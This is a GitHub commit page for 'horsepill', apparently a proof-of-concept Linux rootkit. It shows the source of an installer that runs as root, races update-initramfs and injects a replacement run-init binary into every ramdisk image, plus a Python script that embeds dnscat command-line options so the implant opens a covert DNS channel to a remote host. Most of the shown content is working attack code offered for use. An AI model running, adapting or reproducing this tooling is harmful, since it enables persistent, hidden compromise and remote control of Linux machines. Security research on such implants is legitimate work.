-
Notifications
You must be signed in to change notification settings - Fork 70
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Signed-off-by: Hacker, J.R <r00tkillah@gmail.com>
- Loading branch information
0 parents
commit e3f9f2c
Showing
7 changed files
with
2,213 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,3 @@ | ||
*~ | ||
horsepill_install | ||
run-init |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,7 @@ | ||
all: horsepill_install Makefile | ||
|
||
horsepill_install: horsepill_install.c infect.h infect.c banner.h | ||
gcc -o horsepill_install horsepill_install.c infect.c | ||
|
||
clean: Makefile | ||
rm -v horsepill_install |
Large diffs are not rendered by default.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,169 @@ | ||
#define _GNU_SOURCE /* Needed to get O_LARGEFILE definition */ | ||
#include <stdio.h> | ||
#include <sys/inotify.h> | ||
#include <sys/types.h> | ||
#include <sys/stat.h> | ||
#include <sys/wait.h> | ||
#include <fcntl.h> | ||
#include <stdlib.h> | ||
#include <poll.h> | ||
#include <errno.h> | ||
#include <sched.h> | ||
#include <signal.h> | ||
#include <unistd.h> | ||
#include <string.h> | ||
#include <limits.h> | ||
#include <signal.h> | ||
|
||
#include "banner.h" | ||
#include "infect.h" | ||
|
||
int slurp_file(char *filename) | ||
{ | ||
int rc = -1; | ||
int fd; | ||
struct stat buf; | ||
|
||
rc = open(filename, O_RDONLY); | ||
if (rc < 0) { | ||
perror("open"); | ||
goto out; | ||
} | ||
fd = rc; | ||
rc = fstat(fd, &buf); | ||
if (rc < 0) { | ||
perror("stat"); | ||
goto out; | ||
} | ||
exe.len = buf.st_size; | ||
exe.buf = (unsigned char*)malloc(exe.len); | ||
if (exe.buf == 0) { | ||
perror("malloc"); | ||
goto out; | ||
} | ||
rc = read(fd, (void*)exe.buf, exe.len); | ||
if (rc != exe.len) { | ||
perror("read"); | ||
goto out; | ||
} | ||
close(fd); | ||
|
||
rc = 0; | ||
|
||
out: | ||
return rc; | ||
} | ||
|
||
static void handle_usr1(int signum) | ||
{ | ||
printf("everything should be infected now. Have a nice day\n"); | ||
exit(EXIT_SUCCESS); | ||
} | ||
|
||
|
||
int main(int argc, char **argv) | ||
{ | ||
int rc; | ||
struct pollfd pollfds[1]; | ||
struct sched_param sched = { | ||
.sched_priority = 1 | ||
}; | ||
pid_t update_pid; | ||
|
||
printf("%s\n", banner); | ||
if (getuid() != 0) { | ||
printf("you must run as root\n"); | ||
exit(EXIT_FAILURE); | ||
} | ||
|
||
if (argc < 2) { | ||
printf("usage:\n\t%s: filename\n\nWhere filename is the binary to splat\n", | ||
argv[0]); | ||
exit(EXIT_FAILURE); | ||
} | ||
rc = slurp_file(argv[1]); | ||
if (rc < 0) { | ||
printf("couldn't open file\n"); | ||
exit(EXIT_FAILURE); | ||
} | ||
|
||
update_pid = fork(); | ||
if (update_pid < 0) { | ||
perror("fork"); | ||
exit(EXIT_FAILURE); | ||
} else if (update_pid == 0) { | ||
/* child */ | ||
|
||
nice(10); | ||
sleep(1); | ||
|
||
printf("updating ramdisk images...\n"); | ||
fflush(stdout); | ||
close(1); | ||
close(2); | ||
open("/dev/null", O_WRONLY); | ||
open("/dev/null", O_RDWR); | ||
|
||
system("sh -c 'update-initramfs -k all -u 2>&1 > /dev/null'"); | ||
printf("done!\n"); | ||
kill(getppid(), SIGUSR1); | ||
exit(EXIT_SUCCESS); | ||
} | ||
|
||
signal(SIGUSR1, handle_usr1); | ||
|
||
if (infect_init() < 0) { | ||
perror("could not initialize structure"); | ||
exit(EXIT_FAILURE); | ||
} | ||
|
||
/* there's a race, and we're going to win it */ | ||
rc = sched_setscheduler(getpid(), | ||
SCHED_FIFO | SCHED_RESET_ON_FORK, | ||
&sched); | ||
if (rc < 0) { | ||
perror("could not set scheduler policy"); | ||
exit(EXIT_FAILURE); | ||
} | ||
|
||
pollfds[0].fd = infect_get_inotify_fd(); | ||
pollfds[0].events = POLLIN | POLLNVAL; | ||
|
||
while (1) { | ||
rc = poll(pollfds, 1, 10); | ||
if (rc < 0) { | ||
perror("error in poll"); | ||
exit(EXIT_FAILURE); | ||
} else if (rc == 0) { | ||
int status; | ||
pid_t pid; | ||
|
||
pid = waitpid(update_pid, &status, WNOHANG); | ||
if (pid < 0) { | ||
perror("waitpid"); | ||
exit(EXIT_FAILURE); | ||
} else if (pid == update_pid) { | ||
printf("everything should be infected now. Have a nice day\n"); | ||
exit(EXIT_SUCCESS); | ||
} | ||
} else if (pollfds[0].revents & POLLIN) { | ||
/* Inotify events are available */ | ||
infect_handle_inotify(); | ||
} | ||
|
||
} | ||
return 0; | ||
} | ||
|
||
/* | ||
* Editor modelines - https://www.wireshark.org/tools/modelines.html | ||
* | ||
* Local variables: | ||
* c-basic-offset: 8 | ||
* tab-width: 8 | ||
* indent-tabs-mode: t | ||
* End: | ||
* | ||
* vi: set shiftwidth=8 tabstop=8 noexpandtab: | ||
* :indentSize=8:tabSize=8:noTabs=false: | ||
*/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,86 @@ | ||
#!/usr/bin/env python | ||
|
||
# inputs: binary, output, and options | ||
# outputs fixed binary | ||
|
||
import sys | ||
import subprocess | ||
import tempfile | ||
import base64 | ||
import zlib | ||
|
||
banner = \ | ||
"""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 | ||
0o+16nZhe6dGPPX68T+4Y1qG""" | ||
|
||
based_banner = base64.b64decode(banner) | ||
bnr = zlib.decompress(based_banner) | ||
sys.stdout.write(bnr.decode('ascii')) | ||
|
||
if len(sys.argv) < 2: | ||
sys.stderr.write("usage: %s <run-init binary> <dnscat options>....\n\n" % sys.argv[0]) | ||
sys.stderr.write("Where options are what options to pass to dnscat\n\n") | ||
sys.stderr.write("example:\n") | ||
sys.stderr.write(" %s /path/to/run-init dnscat --secret=%s example.com\n" % | ||
(sys.argv[0], "A"*32)) | ||
sys.exit(-1) | ||
|
||
infilename = sys.argv[1] | ||
options = sys.argv[2:] | ||
|
||
print("\n") | ||
print("input: %s" % infilename) | ||
print("options:"+", ".join(options)) | ||
|
||
with tempfile.NamedTemporaryFile(dir='/tmp', delete=True) as tmpfile: | ||
temp_file_name = tmpfile.name | ||
joined = "\0".join(options) | ||
joined += (4096 - len(joined)) * "\0" | ||
tmpfile.write(bytearray(joined, 'ascii')) | ||
subprocess.check_call(["objcopy", infilename, "--update-section", | ||
"DNSCMDLINE=%s" % temp_file_name]) | ||
print("\nHave a nice day.") | ||
|
Oops, something went wrong.